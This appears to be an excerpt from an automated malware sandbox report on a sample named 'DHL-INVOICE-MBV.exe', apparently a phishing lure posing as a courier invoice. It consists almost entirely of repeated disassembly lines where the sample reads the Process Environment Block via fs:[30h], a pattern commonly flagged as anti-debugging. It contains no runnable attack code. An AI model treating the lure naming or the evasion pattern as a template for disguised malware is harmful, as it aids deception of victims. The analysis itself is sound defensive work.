Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_03281A9B mov eax, dword ptr fs:[00000030h]	1_2_03281A9B
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_03293AE1 mov eax, dword ptr fs:[00000030h]	1_2_03293AE1
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327D6F5 mov eax, dword ptr fs:[00000030h]	1_2_0327D6F5
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_03281439 mov eax, dword ptr fs:[00000030h]	1_2_03281439
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0328143E mov eax, dword ptr fs:[00000030h]	1_2_0328143E
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_03281C50 mov eax, dword ptr fs:[00000030h]	1_2_03281C50
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_03281CAD mov ebx, dword ptr fs:[00000030h]	1_2_03281CAD
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_03281CAD mov eax, dword ptr fs:[00000030h]	1_2_03281CAD
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7DBD71 mov eax, dword ptr fs:[00000030h]	3_2_1D7DBD71
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7DBD71 mov eax, dword ptr fs:[00000030h]	3_2_1D7DBD71
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B5D60 mov eax, dword ptr fs:[00000030h]	3_2_1D7B5D60
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D874DA7 mov eax, dword ptr fs:[00000030h]	3_2_1D874DA7
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A1D50 mov eax, dword ptr fs:[00000030h]	3_2_1D7A1D50
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A1D50 mov eax, dword ptr fs:[00000030h]	3_2_1D7A1D50
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7BDD4D mov eax, dword ptr fs:[00000030h]	3_2_1D7BDD4D
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7BDD4D mov eax, dword ptr fs:[00000030h]	3_2_1D7BDD4D
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7BDD4D mov eax, dword ptr fs:[00000030h]	3_2_1D7BDD4D
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D799D46 mov eax, dword ptr fs:[00000030h]	3_2_1D799D46
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D799D46 mov eax, dword ptr fs:[00000030h]	3_2_1D799D46
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D799D46 mov ecx, dword ptr fs:[00000030h]	3_2_1D799D46
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D85ADD6 mov eax, dword ptr fs:[00000030h]	3_2_1D85ADD6
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D85ADD6 mov eax, dword ptr fs:[00000030h]	3_2_1D85ADD6
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79FD20 mov eax, dword ptr fs:[00000030h]	3_2_1D79FD20
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CAD20 mov eax, dword ptr fs:[00000030h]	3_2_1D7CAD20
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CAD20 mov eax, dword ptr fs:[00000030h]	3_2_1D7CAD20
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CAD20 mov eax, dword ptr fs:[00000030h]	3_2_1D7CAD20
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CAD20 mov ecx, dword ptr fs:[00000030h]	3_2_1D7CAD20
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CAD20 mov eax, dword ptr fs:[00000030h]	3_2_1D7CAD20
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CAD20 mov eax, dword ptr fs:[00000030h]	3_2_1D7CAD20
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CAD20 mov eax, dword ptr fs:[00000030h]	3_2_1D7CAD20
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CAD20 mov eax, dword ptr fs:[00000030h]	3_2_1D7CAD20
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CAD20 mov eax, dword ptr fs:[00000030h]	3_2_1D7CAD20
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CAD20 mov eax, dword ptr fs:[00000030h]	3_2_1D7CAD20
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CCD10 mov eax, dword ptr fs:[00000030h]	3_2_1D7CCD10
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CCD10 mov ecx, dword ptr fs:[00000030h]	3_2_1D7CCD10
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D86CDEB mov eax, dword ptr fs:[00000030h]	3_2_1D86CDEB
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D86CDEB mov eax, dword ptr fs:[00000030h]	3_2_1D86CDEB
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D84FDF4 mov eax, dword ptr fs:[00000030h]	3_2_1D84FDF4
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D84FDF4 mov eax, dword ptr fs:[00000030h]	3_2_1D84FDF4
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D84FDF4 mov eax, dword ptr fs:[00000030h]	3_2_1D84FDF4
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D84FDF4 mov eax, dword ptr fs:[00000030h]	3_2_1D84FDF4
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D84FDF4 mov eax, dword ptr fs:[00000030h]	3_2_1D84FDF4
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D84FDF4 mov eax, dword ptr fs:[00000030h]	3_2_1D84FDF4
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D84FDF4 mov eax, dword ptr fs:[00000030h]	3_2_1D84FDF4
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D84FDF4 mov eax, dword ptr fs:[00000030h]	3_2_1D84FDF4
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D84FDF4 mov eax, dword ptr fs:[00000030h]	3_2_1D84FDF4
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D84FDF4 mov eax, dword ptr fs:[00000030h]	3_2_1D84FDF4
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D84FDF4 mov eax, dword ptr fs:[00000030h]	3_2_1D84FDF4
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D84FDF4 mov eax, dword ptr fs:[00000030h]	3_2_1D84FDF4
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AAD00 mov eax, dword ptr fs:[00000030h]	3_2_1D7AAD00
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AAD00 mov eax, dword ptr fs:[00000030h]	3_2_1D7AAD00
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AAD00 mov eax, dword ptr fs:[00000030h]	3_2_1D7AAD00
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AAD00 mov eax, dword ptr fs:[00000030h]	3_2_1D7AAD00
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AAD00 mov eax, dword ptr fs:[00000030h]	3_2_1D7AAD00
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AAD00 mov eax, dword ptr fs:[00000030h]	3_2_1D7AAD00
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7C0D01 mov eax, dword ptr fs:[00000030h]	3_2_1D7C0D01
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D82CD00 mov eax, dword ptr fs:[00000030h]	3_2_1D82CD00
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D82CD00 mov eax, dword ptr fs:[00000030h]	3_2_1D82CD00
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79EDFA mov eax, dword ptr fs:[00000030h]	3_2_1D79EDFA
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D838D0A mov eax, dword ptr fs:[00000030h]	3_2_1D838D0A
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D85BD08 mov eax, dword ptr fs:[00000030h]	3_2_1D85BD08
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D85BD08 mov eax, dword ptr fs:[00000030h]	3_2_1D85BD08
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7ABDE0 mov eax, dword ptr fs:[00000030h]	3_2_1D7ABDE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7ABDE0 mov eax, dword ptr fs:[00000030h]	3_2_1D7ABDE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7ABDE0 mov eax, dword ptr fs:[00000030h]	3_2_1D7ABDE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7ABDE0 mov eax, dword ptr fs:[00000030h]	3_2_1D7ABDE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7ABDE0 mov eax, dword ptr fs:[00000030h]	3_2_1D7ABDE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7ABDE0 mov eax, dword ptr fs:[00000030h]	3_2_1D7ABDE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7ABDE0 mov eax, dword ptr fs:[00000030h]	3_2_1D7ABDE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7ABDE0 mov eax, dword ptr fs:[00000030h]	3_2_1D7ABDE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CFDE0 mov eax, dword ptr fs:[00000030h]	3_2_1D7CFDE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D850D24 mov eax, dword ptr fs:[00000030h]	3_2_1D850D24
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D850D24 mov eax, dword ptr fs:[00000030h]	3_2_1D850D24
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D850D24 mov eax, dword ptr fs:[00000030h]	3_2_1D850D24
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D850D24 mov eax, dword ptr fs:[00000030h]	3_2_1D850D24
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D798DCD mov eax, dword ptr fs:[00000030h]	3_2_1D798DCD
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7D2DBC mov eax, dword ptr fs:[00000030h]	3_2_1D7D2DBC
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7D2DBC mov ecx, dword ptr fs:[00000030h]	3_2_1D7D2DBC
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D81CD40 mov eax, dword ptr fs:[00000030h]	3_2_1D81CD40
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D81CD40 mov eax, dword ptr fs:[00000030h]	3_2_1D81CD40
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D865D43 mov eax, dword ptr fs:[00000030h]	3_2_1D865D43
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D865D43 mov eax, dword ptr fs:[00000030h]	3_2_1D865D43
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79DDB0 mov eax, dword ptr fs:[00000030h]	3_2_1D79DDB0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A7DB6 mov eax, dword ptr fs:[00000030h]	3_2_1D7A7DB6
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D874D4B mov eax, dword ptr fs:[00000030h]	3_2_1D874D4B
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D821D5E mov eax, dword ptr fs:[00000030h]	3_2_1D821D5E
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D796DA6 mov eax, dword ptr fs:[00000030h]	3_2_1D796DA6
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D875D65 mov eax, dword ptr fs:[00000030h]	3_2_1D875D65
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D825D60 mov eax, dword ptr fs:[00000030h]	3_2_1D825D60
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A6D91 mov eax, dword ptr fs:[00000030h]	3_2_1D7A6D91
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79CD8A mov eax, dword ptr fs:[00000030h]	3_2_1D79CD8A
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79CD8A mov eax, dword ptr fs:[00000030h]	3_2_1D79CD8A
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D846D79 mov esi, dword ptr fs:[00000030h]	3_2_1D846D79
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D823C80 mov ecx, dword ptr fs:[00000030h]	3_2_1D823C80
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A0C79 mov eax, dword ptr fs:[00000030h]	3_2_1D7A0C79
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A0C79 mov eax, dword ptr fs:[00000030h]	3_2_1D7A0C79
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A0C79 mov eax, dword ptr fs:[00000030h]	3_2_1D7A0C79
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A8C79 mov eax, dword ptr fs:[00000030h]	3_2_1D7A8C79
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A8C79 mov eax, dword ptr fs:[00000030h]	3_2_1D7A8C79
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A8C79 mov eax, dword ptr fs:[00000030h]	3_2_1D7A8C79
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A8C79 mov eax, dword ptr fs:[00000030h]	3_2_1D7A8C79
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A8C79 mov eax, dword ptr fs:[00000030h]	3_2_1D7A8C79
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D85FC95 mov eax, dword ptr fs:[00000030h]	3_2_1D85FC95
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79CC68 mov eax, dword ptr fs:[00000030h]	3_2_1D79CC68
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7DBC6E mov eax, dword ptr fs:[00000030h]	3_2_1D7DBC6E
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7DBC6E mov eax, dword ptr fs:[00000030h]	3_2_1D7DBC6E
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B3C60 mov eax, dword ptr fs:[00000030h]	3_2_1D7B3C60
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B3C60 mov eax, dword ptr fs:[00000030h]	3_2_1D7B3C60
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B3C60 mov eax, dword ptr fs:[00000030h]	3_2_1D7B3C60
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B3C60 mov eax, dword ptr fs:[00000030h]	3_2_1D7B3C60
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B3C60 mov ecx, dword ptr fs:[00000030h]	3_2_1D7B3C60
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B3C60 mov ecx, dword ptr fs:[00000030h]	3_2_1D7B3C60
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B3C60 mov eax, dword ptr fs:[00000030h]	3_2_1D7B3C60
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B3C60 mov ecx, dword ptr fs:[00000030h]	3_2_1D7B3C60
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B3C60 mov ecx, dword ptr fs:[00000030h]	3_2_1D7B3C60
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B3C60 mov eax, dword ptr fs:[00000030h]	3_2_1D7B3C60
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B3C60 mov ecx, dword ptr fs:[00000030h]	3_2_1D7B3C60
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B3C60 mov ecx, dword ptr fs:[00000030h]	3_2_1D7B3C60
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B3C60 mov eax, dword ptr fs:[00000030h]	3_2_1D7B3C60
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B3C60 mov eax, dword ptr fs:[00000030h]	3_2_1D7B3C60
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B3C60 mov eax, dword ptr fs:[00000030h]	3_2_1D7B3C60
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B3C60 mov eax, dword ptr fs:[00000030h]	3_2_1D7B3C60
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B3C60 mov eax, dword ptr fs:[00000030h]	3_2_1D7B3C60
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B3C60 mov eax, dword ptr fs:[00000030h]	3_2_1D7B3C60
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B3C60 mov eax, dword ptr fs:[00000030h]	3_2_1D7B3C60
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B3C60 mov eax, dword ptr fs:[00000030h]	3_2_1D7B3C60
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D849C98 mov ecx, dword ptr fs:[00000030h]	3_2_1D849C98
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D849C98 mov eax, dword ptr fs:[00000030h]	3_2_1D849C98
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D849C98 mov eax, dword ptr fs:[00000030h]	3_2_1D849C98
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D849C98 mov eax, dword ptr fs:[00000030h]	3_2_1D849C98
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79DC40 mov eax, dword ptr fs:[00000030h]	3_2_1D79DC40
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B3C40 mov eax, dword ptr fs:[00000030h]	3_2_1D7B3C40
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7D4C3D mov eax, dword ptr fs:[00000030h]	3_2_1D7D4C3D
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D798C3D mov eax, dword ptr fs:[00000030h]	3_2_1D798C3D
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D825CD0 mov eax, dword ptr fs:[00000030h]	3_2_1D825CD0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D832CD0 mov eax, dword ptr fs:[00000030h]	3_2_1D832CD0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D832CD0 mov eax, dword ptr fs:[00000030h]	3_2_1D832CD0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D832CD0 mov eax, dword ptr fs:[00000030h]	3_2_1D832CD0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D874CD2 mov eax, dword ptr fs:[00000030h]	3_2_1D874CD2
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D833CD4 mov eax, dword ptr fs:[00000030h]	3_2_1D833CD4
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D833CD4 mov eax, dword ptr fs:[00000030h]	3_2_1D833CD4
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D833CD4 mov ecx, dword ptr fs:[00000030h]	3_2_1D833CD4
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D833CD4 mov eax, dword ptr fs:[00000030h]	3_2_1D833CD4
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D833CD4 mov eax, dword ptr fs:[00000030h]	3_2_1D833CD4
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B3C20 mov eax, dword ptr fs:[00000030h]	3_2_1D7B3C20
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7BAC20 mov eax, dword ptr fs:[00000030h]	3_2_1D7BAC20
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7BAC20 mov eax, dword ptr fs:[00000030h]	3_2_1D7BAC20
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7BAC20 mov eax, dword ptr fs:[00000030h]	3_2_1D7BAC20
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D837CE8 mov eax, dword ptr fs:[00000030h]	3_2_1D837CE8
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D820CEE mov eax, dword ptr fs:[00000030h]	3_2_1D820CEE
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7D2C10 mov eax, dword ptr fs:[00000030h]	3_2_1D7D2C10
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7D2C10 mov eax, dword ptr fs:[00000030h]	3_2_1D7D2C10
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7D2C10 mov eax, dword ptr fs:[00000030h]	3_2_1D7D2C10
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7D2C10 mov eax, dword ptr fs:[00000030h]	3_2_1D7D2C10
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D81CCF0 mov ecx, dword ptr fs:[00000030h]	3_2_1D81CCF0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D797CF1 mov eax, dword ptr fs:[00000030h]	3_2_1D797CF1
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A3CF0 mov eax, dword ptr fs:[00000030h]	3_2_1D7A3CF0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A3CF0 mov eax, dword ptr fs:[00000030h]	3_2_1D7A3CF0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CECF3 mov eax, dword ptr fs:[00000030h]	3_2_1D7CECF3
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CECF3 mov eax, dword ptr fs:[00000030h]	3_2_1D7CECF3
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7C8CDF mov eax, dword ptr fs:[00000030h]	3_2_1D7C8CDF
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7C8CDF mov eax, dword ptr fs:[00000030h]	3_2_1D7C8CDF
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7BDCD1 mov eax, dword ptr fs:[00000030h]	3_2_1D7BDCD1
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7BDCD1 mov eax, dword ptr fs:[00000030h]	3_2_1D7BDCD1
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7BDCD1 mov eax, dword ptr fs:[00000030h]	3_2_1D7BDCD1
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7DCCD1 mov ecx, dword ptr fs:[00000030h]	3_2_1D7DCCD1
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7DCCD1 mov eax, dword ptr fs:[00000030h]	3_2_1D7DCCD1
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7DCCD1 mov eax, dword ptr fs:[00000030h]	3_2_1D7DCCD1
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7D9CCF mov eax, dword ptr fs:[00000030h]	3_2_1D7D9CCF
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AFCC9 mov eax, dword ptr fs:[00000030h]	3_2_1D7AFCC9
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D796CC0 mov eax, dword ptr fs:[00000030h]	3_2_1D796CC0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D796CC0 mov eax, dword ptr fs:[00000030h]	3_2_1D796CC0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D796CC0 mov eax, dword ptr fs:[00000030h]	3_2_1D796CC0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D837C38 mov eax, dword ptr fs:[00000030h]	3_2_1D837C38
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7D6CC0 mov eax, dword ptr fs:[00000030h]	3_2_1D7D6CC0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D865C38 mov eax, dword ptr fs:[00000030h]	3_2_1D865C38
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D865C38 mov ecx, dword ptr fs:[00000030h]	3_2_1D865C38
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D823C57 mov eax, dword ptr fs:[00000030h]	3_2_1D823C57
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D874C59 mov eax, dword ptr fs:[00000030h]	3_2_1D874C59
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A7C95 mov eax, dword ptr fs:[00000030h]	3_2_1D7A7C95
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A7C95 mov eax, dword ptr fs:[00000030h]	3_2_1D7A7C95
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D797C85 mov eax, dword ptr fs:[00000030h]	3_2_1D797C85
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D797C85 mov eax, dword ptr fs:[00000030h]	3_2_1D797C85
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D797C85 mov eax, dword ptr fs:[00000030h]	3_2_1D797C85
